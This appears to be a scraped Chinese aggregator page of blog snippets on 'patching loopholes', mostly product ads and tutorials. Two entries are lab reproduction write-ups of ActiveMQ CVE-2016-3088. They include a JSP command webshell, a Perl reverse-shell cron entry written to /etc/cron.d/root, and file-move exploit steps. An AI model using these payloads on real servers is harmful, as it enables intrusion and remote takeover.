-
关于Java程序多线程递归弥补管理漏洞
2020-08-10 12:06:36绍关于Java程序多线程递归弥补管理漏洞 -
会话管理漏洞(下)
2017-01-17 20:23:12本课程旨在弥补当前开发、测试、运维工程师对安全知识的认知不足,为更好的安全工作打下坚实的基础。 -
会话管理漏洞(上)
2017-01-17 20:23:12本课程旨在弥补当前开发、测试、运维工程师对安全知识的认知不足,为更好的安全工作打下坚实的基础。 -
监所室内人员定位安全防范管理系统,高精度室内人员定位-新导智能
2020-09-09 14:30:52系统简介 “监所室内人员定位安全防范管理系统”... 1、弥补管理漏洞、降低监管执法风险(如:预防非正常死亡)。 2、解放警力、降低成本、提高工作效率。 3、变被动监管为主动监管,达到事前预防、事中.系统简介
“监所室内人员定位安全防范管理系统”采用物联网技术、计算机通讯技术、数据加密技术、图像处理、云计算、大数据等多种尖端高新领域技术建立多功能的人员定位系统,具有远距离读取功能和定位功能,苏州新导该系统建成后拥有统一的管理平台和数据库,为管理决策提供最翔实的基础数据,是数字化监所通过信息技术提升管理能力的重要平台。
意义与目标
1、弥补管理漏洞、降低监管执法风险(如:预防非正常死亡)。
2、解放警力、降低成本、提高工作效率。
3、变被动监管为主动监管,达到事前预防、事中管控、事后查证管理新思路。
4、提升监管工作智能感知,立体防控、快速处置与精准服务能力。
苏州新导室内人员定位方案优势
主动预警:主动预警,民警遇袭或与突发事件时求助告警,确保民警的人身安全,解决事故发生滞后性问题,将事故隐患提前暴露,避免事故发生。
视频联动:突发现场再现,物联网技术与现有视频结合,可以实时查看事故发生的现场情况,为调配相关警力解决突发事件提供依据。
解放警力降低监管、执法风险:解放警力降低监管、执法风险,减轻工作压力、节约看管成本、实时点名,在押人员位置信息实时在线,行动轨迹跟踪、回放,大大降低了民警的工作强度,有效提高工作效率。
有效杜绝越狱、自杀等恶性事件发生:在关键出入口及周界布放,在押人员靠近、非法进入主动告警,通过带有心率脉搏的电子标签,侦查在押人员生命体征,降低监管执法的风险。
室内人员定位系统功能展示与描述
人员统计点名
1.自动点名 :各区域人员实时统计
2.快速查找:输入姓名首字母或编号,快速查找人员
3.实时追踪:实时追踪警员、访客、重点人员等
4.轨迹回放:历史轨迹录像回放
智能报警
1.新来提醒:新人入监入所提醒
2.求救报警:人员主动求救报警
3.心率异常报警:防止非正常死亡
4.滞留报警:单人滞留告警、滞留时间过长告警
5.聚集报警:人员聚集报警
6.危险报警:非法进入、非法离开报警、关错监室报警
联动对接
1.视频联动:支持海康、大华等厂商定制开发
2.录像合并:视频拼接、打包下载
3.一卡通 :门禁、消费集成
4.门禁:门禁对接
设备自检
1.防拆报警:物理结构与电子检测双重防范
2.信号报警:信号消失报警
3.设备异常:设备断电、断网等异常报警
4.低电压报警:低电压报警后可持续使用一个月
-
经过几个月的测试和试用,CoderHelper 又改进不少!更多的漏洞被修复和弥补!有兴趣的进来看看吧!
2005-11-13 19:53:00不了解的朋友如果要查看截图可以打开这里: http://blog.csdn.net/MysticBoys/Gallery/150145.aspx具体介绍点这里:http://www.mysticboy.nease.net/coderhelper/index.htm目前主要功能如下:工程资源管理器-比CoderHelper没有新加功能,目前版本只是修复了更多的错误!大概30多个地方已经纠正!
不了解的朋友如果要查看截图可以打开这里: http://blog.csdn.net/MysticBoys/Gallery/150145.aspx
具体介绍点这里:
http://www.mysticboy.nease.net/coderhelper/index.htm目前主要功能如下:
工程资源管理器-比VB本身的功能更强大!支持分组管理!
软件国际化工具-可是制作软件语言包!自动编写访问代码和语言包信息!
VB代码窗口中键支持-代码窗口不再有任何鼠标上的不自在
软件帮助体制-快速制作软件帮助,自动创建各个对象的帮助页面以及帮助工程文件,自动配置帮助ID到软件中!让你不再为配备帮助机制而烦恼!
代码注释Web页-自动生成代码注释报表!可为报表自动添加到IIS,或编译为CHM
Share Dll 编译工具 -自动强制编译 ActiveX Dll为 标准可输出函数DLL(如:shell32.dll)
内置浏览器 在IDE内即可浏览网页或其他内容
文本编辑器 可编辑开发LOG,可直接修改VBP FRM。保存后自动重新加载!自动保存功能- 可自动在指定时间间隔中保存工程文件
自动代码备份-自动完成备份!
简单的代码注释-该功能简单实用,HelpCtID是和该方法的HelpContnentID同步的.成员描述也是同步的,它的更改也将更改该成员的描述.开发库和控件时,这时一种添加方法说明的最好方法
新式标签功能-如果你在代码中插入"'>MyCodeA<"这样引号内的内容,您将看到在标签管理器中列出当前活动代码窗口的所有标签,双击它,代码窗口立刻跳至该标记出.大大的方便了您的编程工作.
丰富了命令行功能
命令行中可以直接调用本插件大部分功能。简单的命令即可完成很多复杂的鼠标操作或其他信息!
点这里查看详细内容!
http://www.mysticboy.nease.net/coderhelper/cmdline.htm最新升级包下载地址:
www.mysticboy.nease.net/coderhelper/downdload/ch1.0.52.exe完整安装包和升级包下载地址:
http://www.mysticboy.nease.net/coderhelper/files/CoderHelper.rar -
【漏洞复现】---- ActiveMQ任意文件写入漏洞(CVE-2016-3088)
2020-09-05 09:08:30ActiveMQ的web控制台分为三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是存储文件接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESful API接口...一、简介
ActiveMQ
的web控制台分为三个应用:admin、api和fileserver
,其中admin是管理员页面
,api是接口
,fileserver是存储文件接口
;admin和api都需要登录后才能使用,fileserver无需登录。- fileserver是一个
RESful API
接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作
,其设计的目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷
,但后来发现:- (1) 其使用率并不高
- (2) 文件操作容易出现漏洞
- 所以在
ActiveMQ5.12.x--5.13.x
版本中,已经默认关闭了fileserver
这个应用(可以在conf/jetty.xml
中开启);在5.14.0版本以后彻底删除了fileserver应用
。我们在测试过程中可以关注ActiveMQ的版本,避免走弯路。 - 本漏洞出现在
fileserver应用
中,漏洞的原理就是fileserver支持写入文件(但是不解析jsp)
,同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。文件写入有几种方法:- (1) 写入
webshell
- (2) 写入
cron或者ssh key
等文件 - (3)写入
jar
或者jetty.xml
等库和配置文件
- (1) 写入
- 写入webshell的好处是,门槛低更方便,但前面说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋
- 写入cron和ssh key的好处是
直接反弹shell
,也比较方便,缺点是需要root权限 - 写入jar,稍微麻烦点(需要jar的后门)
- 写入xml配置文件,这个方法比较靠谱,但是有一个鸡肋的地方就是我们需要知道activemq的绝对路径。
二、漏洞环境准备
访问http://192.168.15.148:8161
正常(PS:8161是activemq的web管理页面端口)
三、漏洞复现
我们分别看一下上面说的写入
webshell方法
和写入cron方法
(1) 写入webshell
写入webshell,需要在admin或api应用中,这两个应用
都需要登录才能访问。activemq的默认登录为admin:admin
登录之后首先访问http://192.168.15.148:8161/admin/test/systemProperties.jsp
,查看ActiveMQ的绝对路径
。
我们在这里使用BP上传一个小马文件,命名为2.txt
上传成功之后可以在http://192.168.15.148:8161/fileserver/2.txt
中看到上传的小马文件。
只是现在还无法解析,不止是因为他是2.txt文件,还因为fileserver无法解析.jsp文件
,我们必须把他放到api或者是admin目录下
才可以解析。这里试了vulhub官网的移动文件的HTTP报头,一直都不成功。后来换了一个HTTP包一下就成功了。
把原本在/fileserver/2.txt
的文件移动到/opt/activemq/webapps/api/s.jsp
中。我们来试试执行命令(这里必须要登录成功了才可以执行命令)。
成功!!!
(2) 写入crontab,自动化弹shell
我们的反弹shell命令
为:/usr/bin/perl -e 'use Socket;$i="IP地址";$p=端口号;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
我们通过BP上传该cron定时任务到/fileserver/1.txt
文件中,将该命令设置为每分钟执行一次,所属的用户为root用户
上传成功,接下来改变文件的路径为:/etc/cron.d/root
。
在kali中监听4444端口,反弹shell成功
另:这里上传
ssh的公钥
失败了,就不尝试了,但是学到了生成ssh公钥和密钥的命令:ssh-keygen -t rsa
,该命令会生成两个文件:id_rsa(私钥文件);id_rsa.pub(公钥文件)
,将公钥文件上传到目标服务器,然后我们就可以使用ssh命令登录到目标主机中了。
四、可利用的版本
在
ActiveMQ5.12.x--5.13.x
版本中,已经默认关闭了fileserver这个应用
(可以在conf/jetty.xml
中开启);在5.14.0
版本以后彻底删除了fileserver应用
。 -
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
2021-02-01 00:54:41ActiveMQ任意文件写入漏洞(CVE-2016-3088) 前言 ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能...ActiveMQ任意文件写入漏洞(CVE-2016-3088)
前言
ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。
文件服务器是RESTful API接口。我们可以通过HTTP请求(例如GET,PUT和DELETE)读写存储在其中的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件,但后来发现的缺陷:使用率不高;文件操作容易产生漏洞。
靶机:192.168.168.128
影响范围
ActiveMQ:5.x〜5.13.x
复现过程
Webshell篇
-
访问管理页面,长这样↓,说明环境部署成功。
-
上传java后门到fileserver下,服务器返回204才算成功,后跟代码。
java
<%@ page import=“java.io.*”%>
<%
out.print(“Hello”);
String strcmd=request.getParameter(“passwd”);
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"");
}
%> -
访问
http://192.168.168.128:8161/fileserver/a.jsp
,发现后门文件没有被解析,说明该目录没有执行权限,需要将后门文件移动到具有执行权限的目录下。 -
访问
http://192.168.168.128:8161/admin/test/systemProperties.jsp
查看ActiveMQ绝对路径。
-
将fileserver下的后门文件a.jsp移动到具有执行权限的
/opt/activemq/webapps/api/s.jsp
目录下。 -
访问Webshell。
-
-
ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现
2020-12-12 02:07:10ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现 导语 ActiveMQ的web控制台分三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。admin和api都需要登录后才能使用... -
管理咨询
2019-09-18 06:52:09如何去弥补企业的漏洞?如何去维护企业的健康?管理咨询对企业有什么作用?例如华为公司管理咨询不是万能的客户环境变迁生成新的管理挑战外部技术环境剧烈变化(技术断代创新)外部经济环境剧... -
搅拌站ERP管理系统-砼友ERP
2013-03-13 17:25:33系统将规范企业的管理流程,弥补管理过程中存在的诸多漏洞,减少各部门之间的沟通成本,提高工作效率及生产效率。砼友ERP系统包含销售管理、生产管理、实验室管理、采购管理、库房管理、数据统计、财务管理、GPS调度... -
erp软件对企业管理的作用有哪些?有哪些功能?
2017-11-03 14:57:00实施erp软件是企业踏上信息化管理的第一步,不仅能提高企业办公效率、完善企业管理制度,弥补企业管理漏洞,还能帮助企业在激烈的市场竞争中立于不败之地,可见erp软件对企业的重要性不言而喻。那么,到底什么才是... -
ssh安全远程管理
2019-10-01 04:11:231.什么是ssh SSH 为Secure Shell的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络...SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台... -
Java入门教程之图书管理系统(由简入繁)(三)
2017-03-23 22:13:15上一篇博客我们讲到了用ArrayList来实现图书管理系统,用ArrayList弥补了二中所提到的那两个缺点。但是一个漏洞填完,又来了新的一个漏洞,所谓精益求精嘛。接下来我们就在原代码的基础上加上IO流,对TXT文件进行... -
ssh和sshd服务及管理
2019-10-14 21:29:141.ssh (安全外壳协议) ...2)它是专为远程登录会话(甚至可以用Windows远程登录Linux服务器进行文件互传)和其他网络服务提供安全性的协议,可有效弥补网络中的漏洞。 3)通过SSH,可以把所有传输的数据进行加密,... -
ThinkOX 内容管理 v1.5.0 正式版.zip
2019-07-07 22:46:11ThinkOX 1.5.0 主要的...适合:弥补Onethink对用户中心的不足,让开发人员能够快速构建需要论坛和微博的应用程序。或者让普通站长搭建轻量级论坛和微博的网站。 相关阅读 轻量级社交系统ThinkOX正式版发布 -
Centos7中SSH简介及安全机制的管理(图文详解)
2019-09-18 05:37:03为其他网络服务提供安全性的协议,可有效弥补网络中的漏洞。3.通过SSH,可以把所有传输的数据进行加密,也能够防止DNS欺骗和IP欺骗。4.传输的数据是经过压缩的,所以可以加快传输的速度。所以SSH目前已经... -
SSH连接操作交换机
2016-08-18 10:59:06SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH为建立在应用层和传输层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络...SSH在正确使用时可弥补网络中的漏洞。 -
赤手空拳破解WINDOWS系统密码
2019-07-27 05:19:19早期windows2000系统存在着一个称为输入法漏洞的缺陷,任何一个用户只要了解了这个输入法漏洞的操作方法就可以轻易的在没有弥补该漏洞并且不知道系统用户名和密码的windows2000系统上建立帐户,并设置为管理员权限。... -
对kerberos的理解--经典对话读后
2010-04-09 22:58:00那篇经典对话相信很多人都能将之读完,但是读完之后同样很多人需要时间来消化,事实上那篇对话并不仅仅是在讲kerberos的原理,它更多的意义在于展示了一种研究问题的方法,从简单到复杂,一点一点的弥补漏洞,最终... -
什么是erp软件?erp软件有哪些好用的功能?
2017-11-03 15:40:55实施erp软件是企业踏上信息化管理的第一步,不仅能提高企业办公效率、完善企业管理制度,弥补企业管理漏洞,还能帮助企业在激烈的市场竞争中立于不败之地,可见erp软件对企业的重要性不言而喻。那么,到底什么才是... -
企业上erp软件有价值?有哪些好用的功能?
2017-11-03 16:22:24实施erp软件是企业踏上信息化管理的第一步,不仅能提高企业办公效率、完善企业管理制度,弥补企业管理漏洞,还能帮助企业在激烈的市场竞争中立于不败之地,可见erp软件对企业的重要性不言而喻。那么,到底什么才是... -
论文研究-校园网安全威胁及安全系统构建.pdf
2019-07-22 18:30:10要建立安全的、可运营的校园网, 不仅需要建立安全的电子邮件服务系统、集中式网络病毒防杀系统和必要的防火墙系统, 还需要及时弥补操作系统漏洞和优化应用系统配置, 提高管理人员安全技术水平。 -
Fragment的使用
2019-10-17 11:06:05了解硬件(寄存器、终端、内存、通道、文件等等)和操作系统(内存管理、过程管理、线程管理等等); 学习软件逆向分析技术,使软件开发者能够更好的弥补软件缺陷,修复软件漏洞,提升软件安全,将损失降为最低; -
1)常见的开发场景,使用传统的svn会遇到哪些问题
2019-10-24 21:27:49了解硬件(寄存器、终端、内存、通道、文件等等)和操作系统(内存管理、过程管理、线程管理等等); 学习软件逆向分析技术,使软件开发者能够更好的弥补软件缺陷,修复软件漏洞,提升软件安全,将损失降为最低; -
2)设计整套的开发流程
2019-10-24 21:29:30了解硬件(寄存器、终端、内存、通道、文件等等)和操作系统(内存管理、过程管理、线程管理等等); 学习软件逆向分析技术,使软件开发者能够更好的弥补软件缺陷,修复软件漏洞,提升软件安全,将损失降为最低; -
3)结合git工具,进行模拟开发
2019-10-24 21:31:18了解硬件(寄存器、终端、内存、通道、文件等等)和操作系统(内存管理、过程管理、线程管理等等); 学习软件逆向分析技术,使软件开发者能够更好的弥补软件缺陷,修复软件漏洞,提升软件安全,将损失降为最低; -
英雄联盟-E语言演示制作走砍脚本2
2019-10-13 12:47:32了解硬件(寄存器、终端、内存、通道、文件等等)和操作系统(内存管理、过程管理、线程管理等等); 学习软件逆向分析技术,使软件开发者能够更好的弥补软件缺陷,修复软件漏洞,提升软件安全,将损失降为最低; -
英雄联盟-内存动态特效换肤分析2
2019-10-09 14:42:24了解硬件(寄存器、终端、内存、通道、文件等等)和操作系统(内存管理、过程管理、线程管理等等); 学习软件逆向分析技术,使软件开发者能够更好的弥补软件缺陷,修复软件漏洞,提升软件安全,将损失降为最低;
-
FPGA | paramter 、localparam的小“秘密”
-
实用技能:60条常用linux命令
-
游戏配音后的必要工作—后期处理
-
oracle9i310.rar
-
MHA 高可用 MySQL 架构与 Altas 读写分离
-
虚幻4引擎基础
-
python-random-quote:用Python编写的基于文件的报价机器人-源码
-
RapidScada从入门到精通
-
Unity 热更新技术-ILRuntime
-
整体到细节的交互设计规划
-
03-名企培训课件资料整理(32份).zip
-
Ansible-role-elasticsearch-源码
-
用微服务spring cloud架构打造物联网云平台
-
maven基础和常见的问题
-
基于电商业务的全链路数据中台落地方案(全渠道、全环节、全流程)
-
uniapp中动态添加及修改导航栏
-
剑指offer-2.26-24
-
Kaggle借贷俱乐部P2P网贷数据分析
-
NC141-判断回文-【字符串、双指针】
-
HTTP和HTTPS发展历史精编